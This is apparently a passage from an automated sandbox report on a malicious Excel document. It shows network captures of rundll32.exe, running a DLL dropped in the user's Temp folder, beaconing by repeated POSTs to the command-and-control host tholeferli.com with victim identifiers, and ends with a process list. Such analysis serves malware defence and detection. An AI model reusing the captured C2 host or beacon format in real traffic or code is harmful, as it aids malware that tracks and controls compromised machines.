                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:47.444124937 CEST | kBytes transferred: 391 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:47 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGZATARRABw==0


                                                Session ID: 86 | Source IP: 192.168.2.22 | Source Port: 49253 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:47.718240023 CEST | kBytes transferred: 391 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:47.875224113 CEST | kBytes transferred: 392 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:47 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZMNAARRABw==0


                                                Session ID: 87 | Source IP: 192.168.2.22 | Source Port: 49254 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:48.149163961 CEST | kBytes transferred: 393 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:48.315056086 CEST | kBytes transferred: 393 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:48 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZJQAARRABw==0


                                                Session ID: 88 | Source IP: 192.168.2.22 | Source Port: 49255 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:48.587294102 CEST | kBytes transferred: 394 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:48.743767977 CEST | kBytes transferred: 394 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:48 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 47 54 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTGTGARRABw==0


                                                Session ID: 89 | Source IP: 192.168.2.22 | Source Port: 49256 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:49.030864954 CEST | kBytes transferred: 395 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:49.186918974 CEST | kBytes transferred: 395 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:49 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 56 45 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFVEUARRABw==0


                                                Session ID: 9 | Source IP: 192.168.2.22 | Source Port: 49176 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:07.405028105 CEST | kBytes transferred: 301 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:07.562021971 CEST | kBytes transferred: 301 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 47 54 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJGTQARRABw==0


                                                Session ID: 90 | Source IP: 192.168.2.22 | Source Port: 49257 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:49.458745956 CEST | kBytes transferred: 396 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:49.625276089 CEST | kBytes transferred: 396 | Direction: IN | Data:
                                                HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:49 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 51 4a 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHQJSARRABw==0


                                                Session ID: 91 | Source IP: 192.168.2.22 | Source Port: 49258 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:49.899928093 CEST | kBytes transferred: 397 | Direction: OUT | Data:
                                                POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:50.072293997 CEST  397                 IN         HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:49 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 48 53 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYHSBARRABw==0


                                                Session ID: 92  Source IP: 192.168.2.22  Source Port: 49259  Destination IP: 194.147.115.74  Destination Port: 80  Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp                             kBytes transferred  Direction  Data
                                                Jul 22, 2021 16:11:50.362248898 CEST  398                 OUT        POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:50.531900883 CEST  398                 IN         HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:50 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 48 53 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVHSEARRABw==0


                                                Session ID: 93  Source IP: 192.168.2.22  Source Port: 49260  Destination IP: 194.147.115.74  Destination Port: 80  Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp                             kBytes transferred  Direction  Data
                                                Jul 22, 2021 16:11:50.801610947 CEST  399                 OUT        POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:50.971095085 CEST  400                 IN         HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:50 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 51 4a 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBQJYARRABw==0


                                                Session ID: 94  Source IP: 192.168.2.22  Source Port: 49261  Destination IP: 194.147.115.74  Destination Port: 80  Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp                             kBytes transferred  Direction  Data
                                                Jul 22, 2021 16:11:51.277574062 CEST  400                 OUT        POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:51.433959007 CEST  401                 IN         HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:51 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 4a 51 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYJQBARRABw==0


                                                Session ID: 95  Source IP: 192.168.2.22  Source Port: 49262  Destination IP: 194.147.115.74  Destination Port: 80  Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp                             kBytes transferred  Direction  Data
                                                Jul 22, 2021 16:11:51.715058088 CEST  402                 OUT        POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:51.870856047 CEST  402                 IN         HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:51 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 46 55 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJFUQARRABw==0


                                                Session ID: 96  Source IP: 192.168.2.22  Source Port: 49263  Destination IP: 194.147.115.74  Destination Port: 80  Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp                             kBytes transferred  Direction  Data
                                                Jul 22, 2021 16:11:52.144679070 CEST  403                 OUT        POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:52.313642025 CEST  403                 IN         HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:52 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 4a 51 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJJQQARRABw==0


                                                Session ID: 97  Source IP: 192.168.2.22  Source Port: 49264  Destination IP: 194.147.115.74  Destination Port: 80  Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp                             kBytes transferred  Direction  Data
                                                Jul 22, 2021 16:11:52.598970890 CEST  404                 OUT        POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:52.765852928 CEST  404                 IN         HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:52 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 56 45 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNVEMARRABw==0


                                                Session ID: 98  Source IP: 192.168.2.22  Source Port: 49265  Destination IP: 194.147.115.74  Destination Port: 80  Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp                             kBytes transferred  Direction  Data
                                                Jul 22, 2021 16:11:53.057029009 CEST  405                 OUT        POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:53.214713097 CEST  405                 IN         HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:53 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 41 5a 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFAZUARRABw==0


                                                Session ID: 99  Source IP: 192.168.2.22  Source Port: 49266  Destination IP: 194.147.115.74  Destination Port: 80  Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp                             kBytes transferred  Direction  Data
                                                Jul 22, 2021 16:11:53.486310005 CEST  406                 OUT        POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:53.658466101 CEST  406                 IN         HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:53 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 5a 41 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMZANARRABw==0


                                                Code Manipulations

                                                Statistics

                                                CPU Usage


                                                Memory Usage


                                                High Level Behavior Distribution


                                                Behavior


                                                System Behavior

                                                General

                                                Start time: 16:10:37
                                                Start date: 22/07/2021
                                                Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                Wow64 process (32bit): false
                                                Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                Imagebase: 0x13f450000
                                                File size: 27641504 bytes
                                                MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Reputation: high

                                                General

                                                Start time: 16:10:38
                                                Start date: 22/07/2021
                                                Path: C:\Windows\System32\IME\IMEJP10\imjppdmg.exe
                                                Wow64 process (32bit): false
                                                Commandline: /Migration
                                                Imagebase: 0xffdb0000
                                                File size: 30208 bytes
                                                MD5 hash: 3716DEC1E0B88BB19968BBC2659B02A1
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Reputation: moderate

                                                General

                                                Start time: 16:10:41
                                                Start date: 22/07/2021
                                                Path: C:\Windows\System32\rundll32.exe
                                                Wow64 process (32bit): false
                                                Commandline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                                                Imagebase: 0xff020000
                                                File size: 45568 bytes
                                                MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Reputation: high

                                                General

                                                Start time: 16:10:41
                                                Start date: 22/07/2021
                                                Path: C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit): true
                                                Commandline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                                                Imagebase: 0xb60000
                                                File size: 44544 bytes
                                                MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Yara matches:
